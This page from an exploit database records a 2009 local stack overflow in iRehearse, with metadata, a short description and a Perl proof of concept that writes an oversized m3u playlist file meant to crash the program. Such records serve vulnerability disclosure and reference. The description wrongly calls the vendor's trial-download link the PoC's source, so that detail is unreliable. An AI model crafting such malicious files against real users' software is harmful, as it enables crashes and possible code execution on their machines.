header-logo
Suggest Exploit
vendor:
iRehearse
by:
opt!x hacker
7,8
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: iRehearse
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

iRehearse (m3u) local stack overflow POC

This exploit is for a local stack overflow vulnerability in iRehearse. The vulnerability is triggered when a specially crafted m3u file is opened. The file contains a header of 'MILW0RM' followed by 40 'A' characters, which causes a stack overflow. This exploit was discovered by opt!x hacker and the proof of concept can be downloaded from http://rjvmedia.co.uk/software/iRehearseTrial.zip.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#iRehearse (m3u) local stack overlow POC
#finded by opt!x hacker  <optix@9.cn>
#download : http://rjvmedia.co.uk/software/iRehearseTrial.zip
my $header="MILW0RM";
my $crash="A" x 40;
my $poc=$header.$crash;
open(myfile,'>>aidi.m3u');
print myfile $poc;

# milw0rm.com [2009-08-07]

Navigation

Suggest Exploit

Services By CQR